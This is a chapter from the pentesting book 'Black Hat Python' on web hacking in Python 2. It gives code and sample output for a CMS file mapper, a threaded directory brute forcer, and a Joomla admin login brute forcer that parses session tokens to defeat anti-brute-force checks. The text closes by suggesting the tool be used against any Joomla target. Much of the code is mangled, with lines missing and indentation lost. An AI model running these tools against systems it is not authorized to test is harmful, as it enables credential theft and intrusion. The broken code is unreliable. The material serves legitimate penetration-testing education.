Web Hackery - Black Hat Python: Python Programming for Hackers and Pentesters (2014)

Black Hat Python: Python Programming for Hackers and Pentesters (2014)

Chapter 5. Web Hackery

Analyzing web applications is absolutely critical for an attacker or penetration tester. In most modern networks, web applications present the largest attack surface and so are also the most common avenue for gaining access. There are a number of excellent web application tools that have been written in Python, including w3af, sqlmap, and others. Quite frankly, topics such as SQL injection have been beaten to death, and the tooling available is mature enough that we don’t need to reinvent the wheel. Instead, we’ll explore the basics of interacting with the Web using Python, and then build on this knowledge to create reconnaissance and brute-force tooling. You’ll see how HTML parsing can be useful in creating brute forcers, recon tooling, and mining text-heavy sites. The idea is to create a few different tools to give you the fundamental skills you need to build any type of web application assessment tool that your particular attack scenario calls for.

The Socket Library of the Web: urllib2

Much like writing network tooling with the socket library, when you’re creating tools to interact with web services, you’ll use the urllib2 library. Let’s take a look at making a very simple GET request to the No Starch Press website:

import urllib2

➊ body = urllib2.urlopen("http://www.nostarch.com")

➋ print body.read()

This is the simplest example of how to make a GET request to a website. Be mindful that we are just fetching the raw page from the No Starch website, and that no JavaScript or other client-side languages will execute. We simply pass in a URL to the urlopen function ➊ and it returns a file-like object that allows us to read back ➋ the body of what the remote web server returns. In most cases, however, you are going to want more finely grained control over how you make these requests, including being able to define specific headers, handle cookies, and create POST requests.urllib2 exposes a Request class that gives you this level of control. Below is an example of how to create the same GET request using the Request class and defining a custom User-Agent HTTP header:

import urllib2

url = "http://www.nostarch.com"

➊ headers = {}

headers['User-Agent'] = "Googlebot"

➋ request = urllib2.Request(url,headers=headers)

➌ response = urllib2.urlopen(request)

print response.read()


The construction of a Request object is slightly different than our previous example. To create custom headers, you define a headers dictionary ➊, which allows you to then set the header key and value that you want to use. In this case, we’re going to make our Python script appear to be the Googlebot. We then create our Request object and pass in the url and the headers dictionary ➋, and then pass the Request object to the urlopen function call ➌. This returns a normal file-like object that we can use to read in the data from the remote website.

We now have the fundamental means to talk to web services and websites, so let’s create some useful tooling for any web application attack or penetration test.

Mapping Open Source Web App Installations

Content management systems and blogging platforms such as Joomla, WordPress, and Drupal make starting a new blog or website simple, and they’re relatively common in a shared hosting environment or even an enterprise network. All systems have their own challenges in terms of installation, configuration, and patch management, and these CMS suites are no exception. When an overworked sysadmin or a hapless web developer doesn’t follow all security and installation procedures, it can be easy pickings for an attacker to gain access to the web server.

Because we can download any open source web application and locally determine its file and directory structure, we can create a purpose-built scanner that can hunt for all files that are reachable on the remote target. This can root out leftover installation files, directories that should be protected by .htaccess files, and other goodies that can assist an attacker in getting a toehold on the web server. This project also introduces you to using Python Queue objects, which allow us to build a large, thread-safe stack of items and have multiple threads pick items for processing. This will allow our scanner to run very rapidly. Let’s open web_app_mapper.py and enter the following code:

import Queue

import threading

import os

import urllib2

threads = 10

➊ target = "http://www.blackhatpython.com"

directory = "/Users/justin/Downloads/joomla-3.1.1"

filters = [".jpg",".gif","png",".css"]


➋ web_paths = Queue.Queue()

➌ for r,d,f in os.walk("."):

for files in f:

remote_path = "%s/%s" % (r,files)

if remote_path.startswith("."):

remote_path = remote_path[1:]

if os.path.splitext(files)[1] not in filters:


def test_remote():

➍ while not web_paths.empty():

path = web_paths.get()

url = "%s%s" % (target, path)

request = urllib2.Request(url)


response = urllib2.urlopen(request)

content = response.read()

➎ print "[%d] => %s" % (response.code,path)


➏ except urllib2.HTTPError as error:

#print "Failed %s" % error.code


➐ for i in range(threads):

print "Spawning thread: %d" % i

t = threading.Thread(target=test_remote)


We begin by defining the remote target website ➊ and the local directory into which we have downloaded and extracted the web application. We also create a simple list of file extensions that we are not interested in fingerprinting. This list can be different depending on the target application. The web_paths ➋ variable is our Queue object where we will store the files that we’ll attempt to locate on the remote server. We then use the os.walk ➌ function to walk through all of the files and directories in the local web application directory. As we walk through the files and directories, we’re building the full path to the target files and testing them against our filter list to make sure we are only looking for the file types we want. For each valid file we find locally, we add it to our web_paths Queue.

Looking at the bottom of the script ➐, we are creating a number of threads (as set at the top of the file) that will each be called the test_remote function. The test_remote function operates in a loop that will keep executing until the web_paths Queue is empty. On each iteration of the loop, we grab a path from the Queue ➍, add it to the target website’s base path, and then attempt to retrieve it. If we’re successful in retrieving the file, we output the HTTP status code and the full path to the file ➎. If the file is not found or is protected by an .htaccess file, this will cause urllib2 to throw an error, which we handle ➏ so the loop can continue executing.

Kicking the Tires

For testing purposes, I installed Joomla 3.1.1 into my Kali VM, but you can use any open source web application that you can quickly deploy or that you have running already. When you run web_app_mapper.py, you should see output like the following:

Spawning thread: 0

Spawning thread: 1

Spawning thread: 2

Spawning thread: 3

Spawning thread: 4

Spawning thread: 5

Spawning thread: 6

Spawning thread: 7

Spawning thread: 8

Spawning thread: 9

[200] => /htaccess.txt

[200] => /web.config.txt

[200] => /LICENSE.txt

[200] => /README.txt

[200] => /administrator/cache/index.html

[200] => /administrator/components/index.html

[200] => /administrator/components/com_admin/controller.php

[200] => /administrator/components/com_admin/script.php

[200] => /administrator/components/com_admin/admin.xml

[200] => /administrator/components/com_admin/admin.php

[200] => /administrator/components/com_admin/helpers/index.html

[200] => /administrator/components/com_admin/controllers/index.html

[200] => /administrator/components/com_admin/index.html

[200] => /administrator/components/com_admin/helpers/html/index.html

[200] => /administrator/components/com_admin/models/index.html

[200] => /administrator/components/com_admin/models/profile.php

[200] => /administrator/components/com_admin/controllers/profile.php

You can see that we are picking up some valid results including some .txt files and XML files. Of course, you can build additional intelligence into the script to only return files you’re interested in — such as those with the word install in them.

Brute-Forcing Directories and File Locations

The previous example assumed a lot of knowledge about your target. But in many cases where you’re attacking a custom web application or large e-commerce system, you won’t be aware of all of the files accessible on the web server. Generally, you’ll deploy a spider, such as the one included in Burp Suite, to crawl the target website in order to discover as much of the web application as possible. However, in a lot of cases there are configuration files, leftover development files, debugging scripts, and other security breadcrumbs that can provide sensitive information or expose functionality that the software developer did not intend. The only way to discover this content is to use a brute-forcing tool to hunt down common filenames and directories.

We’ll build a simple tool that will accept wordlists from common brute forcers such as the DirBuster project[10] or SVNDigger,[11] and attempt to discover directories and files that are reachable on the target web server. As before, we’ll create a pool of threads to aggressively attempt to discover content. Let’s start by creating some functionality to create a Queue out of a wordlist file. Open up a new file, name it content_bruter.py, and enter the following code:

import urllib2

import threading

import Queue

import urllib

threads = 50

target_url = "http://testphp.vulnweb.com"

wordlist_file = "/tmp/all.txt" # from SVNDigger

resume = None

user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101


def build_wordlist(wordlist_file):

# read in the word list

➊ fd = open(wordlist_file,"rb")

raw_words = fd.readlines()


found_resume = False

words = Queue.Queue()

➋ for word in raw_words:

word = word.rstrip()

if resume is not None:

if found_resume:



if word == resume:

found_resume = True

print "Resuming wordlist from: %s" % resume



return words

This helper function is pretty straightforward. We read in a wordlist file ➊ and then begin iterating over each line in the file ➋. We have some built-in functionality that allows us to resume a brute-forcing session if our network connectivity is interrupted or the target site goes down. This can be achieved by simply setting the resume variable to the last path that the brute forcer tried. When the entire file has been parsed, we return a Queue full of words to use in our actual brute-forcing function. We will reuse this function later in this chapter.

We want some basic functionality to be available to our brute-forcing script. The first is the ability to apply a list of extensions to test for when making requests. In some cases, you want to try not only the /admin directly for example, but admin.php, admin.inc, and admin.html.

def dir_bruter(word_queue,extensions=None):

while not word_queue.empty():

attempt = word_queue.get()

attempt_list = []

# check to see if there is a file extension; if not,

# it's a directory path we're bruting

➊ if "." not in attempt:

attempt_list.append("/%s/" % attempt)


attempt_list.append("/%s" % attempt)

# if we want to bruteforce extensions

➋ if extensions:

for extension in extensions:

attempt_list.append("/%s%s" % (attempt,extension))

# iterate over our list of attempts

for brute in attempt_list:

url = "%s%s" % (target_url,urllib.quote(brute))


headers = {}

➌ headers["User-Agent"] = user_agent

r = urllib2.Request(url,headers=headers)

response = urllib2.urlopen(r)

➍ if len(response.read()):

print "[%d] => %s" % (response.code,url)

except urllib2.URLError,e:

if hasattr(e, 'code') and e.code != 404:

➎ print "!!! %d => %s" % (e.code,url)


Our dir_bruter function accepts a Queue object that is populated with words to use for brute-forcing and an optional list of file extensions to test. We begin by testing to see if there is a file extension in the current word ➊, and if there isn’t, we treat it as a directory that we want to test for on the remote web server. If there is a list of file extensions passed in ➋, then we take the current word and apply each file extension that we want to test for. It can be useful here to think of using extensions like .orig and .bak on top of the regular programming language extensions. After we build a list of brute-forcing attempts, we set the User-Agent header to something innocuous ➌ and test the remote web server. If the response code is a 200, we output the URL ➍, and if we receive anything but a 404 we also output it ➎ because this could indicate something interesting on the remote web server aside from a “file not found” error.

It’s useful to pay attention to and react to your output because, depending on the configuration of the remote web server, you may have to filter out more HTTP error codes in order to clean up your results. Let’s finish out the script by setting up our wordlist, creating a list of extensions, and spinning up the brute-forcing threads.

word_queue = build_wordlist(wordlist_file)

extensions = [".php",".bak",".orig",".inc"]

for i in range(threads):

t = threading.Thread(target=dir_bruter,args=(word_queue,extensions,))


The code snip above is pretty straightforward and should look familiar by now. We get our list of words to brute-force, create a simple list of file extensions to test for, and then spin up a bunch of threads to do the brute-forcing.

Kicking the Tires

OWASP has a list of online and offline (virtual machines, ISOs, etc.) vulnerable web applications that you can test your tooling against. In this case, the URL that is referenced in the source code points to an intentionally buggy web application hosted by Acunetix. The cool thing is that it shows you how effective brute-forcing a web application can be. I recommend you set the thread_count variable to something sane such as 5 and run the script. In short order, you should start seeing results such as the ones below:

[200] => http://testphp.vulnweb.com/CVS/

[200] => http://testphp.vulnweb.com/admin/

[200] => http://testphp.vulnweb.com/index.bak

[200] => http://testphp.vulnweb.com/search.php

[200] => http://testphp.vulnweb.com/login.php

[200] => http://testphp.vulnweb.com/images/

[200] => http://testphp.vulnweb.com/index.php

[200] => http://testphp.vulnweb.com/logout.php

[200] => http://testphp.vulnweb.com/categories.php

You can see that we are pulling some interesting results from the remote website. I cannot stress enough the importance to perform content brute-forcing against all of your web application targets.

Brute-Forcing HTML Form Authentication

There may come a time in your web hacking career where you need to either gain access to a target, or if you’re consulting, you might need to assess the password strength on an existing web system. It has become more and more common for web systems to have brute-force protection, whether a captcha, a simple math equation, or a login token that has to be submitted with the request. There are a number of brute forcers that can do the brute-forcing of a POST request to the login script, but in a lot of cases they are not flexible enough to deal with dynamic content or handle simple “are you human” checks. We’ll create a simple brute forcer that will be useful against Joomla, a popular content management system. Modern Joomla systems include some basic anti-brute-force techniques, but still lack account lockouts or strong captchas by default.

In order to brute-force Joomla, we have two requirements that need to be met: retrieve the login token from the login form before submitting the password attempt and ensure that we accept cookies in our urllib2 session. In order to parse out the login form values, we’ll use the native Python class HTMLParser. This will also be a good whirlwind tour of some additional features of urllib2 that you can employ when building tooling for your own targets. Let’s get started by having a look at the Joomla administrator login form. This can be found by browsing tohttp://<yourtarget>.com/administrator/. For the sake of brevity, I’ve only included the relevant form elements.

<form action="/administrator/index.php" method="post" id="form-login"


<input name="username" tabindex="1" id="mod-login-username" type="text"

class="input-medium" placeholder="User Name" size="15"/>

<input name="passwd" tabindex="2" id="mod-login-password" type="password"

class="input-medium" placeholder="Password" size="15"/>

<select id="lang" name="lang" class="inputbox advancedSelect">

<option value="" selected="selected">Language - Default</option>

<option value="en-GB">English (United Kingdom)</option>


<input type="hidden" name="option" value="com_login"/>

<input type="hidden" name="task" value="login"/>

<input type="hidden" name="return" value="aW5kZXgucGhw"/>

<input type="hidden" name="1796bae450f8430ba0d2de1656f3e0ec" value="1" />


Reading through this form, we are privy to some valuable information that we’ll need to incorporate into our brute forcer. The first is that the form gets submitted to the /administrator/index.php path as an HTTP POST. The next are all of the fields required in order for the form submission to be successful. In particular, if you look at the last hidden field, you’ll see that its name attribute is set to a long, randomized string. This is the essential piece of Joomla’s anti-brute-forcing technique. That randomized string is checked against your current user session, stored in a cookie, and even if you are passing the correct credentials into the login processing script, if the randomized token is not present, the authentication will fail. This means we have to use the following request flow in our brute forcer in order to be successful against Joomla:

1. Retrieve the login page, and accept all cookies that are returned.

2. Parse out all of the form elements from the HTML.

3. Set the username and/or password to a guess from our dictionary.

4. Send an HTTP POST to the login processing script including all HTML form fields and our stored cookies.

5. Test to see if we have successfully logged in to the web application.

You can see that we are going to be utilizing some new and valuable techniques in this script. I will also mention that you should never “train” your tooling on a live target; always set up an installation of your target web application with known credentials and verify that you get the desired results. Let’s open a new Python file named joomla_killer.py and enter the following code:

import urllib2

import urllib

import cookielib

import threading

import sys

import Queue

from HTMLParser import HTMLParser

# general settings

user_thread = 10

username = "admin"

wordlist_file = "/tmp/cain.txt"

resume = None

# target specific settings

➊ target_url = ""

target_post = ""

➋ username_field= "username"

password_field= "passwd"

➌ success_check = "Administration - Control Panel"

These general settings deserve a bit of explanation. The target_url variable ➊ is where our script will first download and parse the HTML. The target_post variable is where we will submit our brute-forcing attempt. Based on our brief analysis of the HTML in the Joomla login, we can setthe username_field and password_field ➋ variables to the appropriate name of the HTML elements. Our success_check variable ➌ is a string that we’ll check for after each brute-forcing attempt in order to determine whether we are successful or not. Let’s now create the plumbing for our brute forcer; some of the following code will be familiar so I’ll only highlight the newest techniques.

class Bruter(object):

def __init__(self, username, words):

self.username = username

self.password_q = words

self.found = False

print "Finished setting up for: %s" % username

def run_bruteforce(self):

for i in range(user_thread):

t = threading.Thread(target=self.web_bruter)


def web_bruter(self):

while not self.password_q.empty() and not self.found:

brute = self.password_q.get().rstrip()

➊ jar = cookielib.FileCookieJar("cookies")

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

response = opener.open(target_url)

page = response.read()

print "Trying: %s : %s (%d left)" % (self.username,brute,self.


# parse out the hidden fields

➋ parser = BruteParser()


post_tags = parser.tag_results

# add our username and password fields

➌ post_tags[username_field] = self.username

post_tags[password_field] = brute

➍ login_data = urllib.urlencode(post_tags)

login_response = opener.open(target_post, login_data)

login_result = login_response.read()

➎ if success_check in login_result:

self.found = True

print "[*] Bruteforce successful."

print "[*] Username: %s" % username

print "[*] Password: %s" % brute

print "[*] Waiting for other threads to exit..."

This is our primary brute-forcing class, which will handle all of the HTTP requests and manage cookies for us. After we grab our password attempt, we set up our cookie jar➊ using the FileCookieJar class that will store the cookies in the cookies file. Next we initialize our urllib2 opener, passing in the initialized cookie jar, which tells urllib2 to pass off any cookies to it. We then make the initial request to retrieve the login form. When we have the raw HTML, we pass it off to our HTML parser and call its feed method ➋, which returns a dictionary of all of the retrieved form elements. After we have successfully parsed the HTML, we replace the username and password fields with our brute-forcing attempt ➌. Next we URL encode the POST variables ➍, and then pass them in our subsequent HTTP request. After we retrieve the result of our authentication attempt, we test whether the authentication was successful or not ➎. Now let’s implement the core of our HTML processing. Add the following class to your joomla_killer.py script:

class BruteParser(HTMLParser):

def __init__(self):


➊ self.tag_results = {}

def handle_starttag(self, tag, attrs):

➋ if tag == "input":

tag_name = None

tag_value = None

for name,value in attrs:

if name == "name":

➌ tag_name = value

if name == "value":

➍ tag_value = value

if tag_name is not None:

➎ self.tag_results[tag_name] = value

This forms the specific HTML parsing class that we want to use against our target. After you have the basics of using the HTMLParser class, you can adapt it to extract information from any web application that you might be attacking. The first thing we do is create a dictionary in which our results will be stored ➊. When we call the feed function, it passes in the entire HTML document and our handle_starttag function is called whenever a tag is encountered. In particular, we’re looking for HTML input tags ➋ and our main processing occurs when we determine that we have found one. We begin iterating over the attributes of the tag, and if we find the name➌ or value ➍ attributes, we associate them in the tag_results dictionary ➎. After the HTML has been processed, our brute-forcing class can then replace the username and password fields while leaving the remainder of the fields intact.


There are three primary methods you can implement when using the HTMLParser class: handle_starttag, handle_endtag, and handle_data . The handle_starttag function will be called any time an opening HTML tag is encountered, and the opposite is true for the handle_endtag function, which gets called each time a closing HTML tag is encountered . The handle_data function gets called when there is raw text in between tags . The function prototypes for each function are slightly different, as follows:

handle_starttag(self, tag, attributes)

handle_endttag(self, tag)

handle_data(self, data)

A quick example to highlight this:

<title>Python rocks!</title>

handle_starttag => tag variable would be "title"

handle_data => data variable would be "Python rocks!"

handle_endtag => tag variable would be "title"

With this very basic understanding of the HTMLParser class, you can do things like parse forms, find links for spidering, extract all of the pure text for data mining purposes, or find all of the images in a page.

To wrap up our Joomla brute forcer, let’s copy-paste the build_wordlist function from our previous section and add the following code:

# paste the build_wordlist function here

words = build_wordlist(wordlist_file)

bruter_obj = Bruter(username,words)


That’s it! We simply pass in the username and our wordlist to our Bruter class and watch the magic happen.

Kicking the Tires

If you don’t have Joomla installed into your Kali VM, then you should install it now. My target VM is at and I am using a wordlist provided by Cain and Abel,[12] a popular brute-forcing and cracking toolset. I have already preset the username to admin and the password tojustin in the Joomla installation so that I can make sure it works. I then added justin to the cain.txt wordlist file about 50 entries or so down the file. When running the script, I get the following output:

$ python2.7 joomla_killer.py

Finished setting up for: admin

Trying: admin : 0racl38 (306697 left)

Trying: admin : !@#$% (306697 left)

Trying: admin : !@#$%^ (306697 left)


Trying: admin : 1p2o3i (306659 left)

Trying: admin : 1qw23e (306657 left)

Trying: admin : 1q2w3e (306656 left)

Trying: admin : 1sanjose (306655 left)

Trying: admin : 2 (306655 left)

Trying: admin : justin (306655 left)

Trying: admin : 2112 (306646 left)

[*] Bruteforce successful.

[*] Username: admin

[*] Password: justin

[*] Waiting for other threads to exit...

Trying: admin : 249 (306646 left)

Trying: admin : 2welcome (306646 left)

You can see that it successfully brute-forces and logs in to the Joomla administrator console. To verify, you of course would manually log in and make sure. After you test this locally and you’re certain it works, you can use this tool against a target Joomla installation of your choice.

[10] DirBuster Project: https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

[11] SVNDigger Project: https://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/

[12] Cain and Abel: http://www.oxid.it/cain.html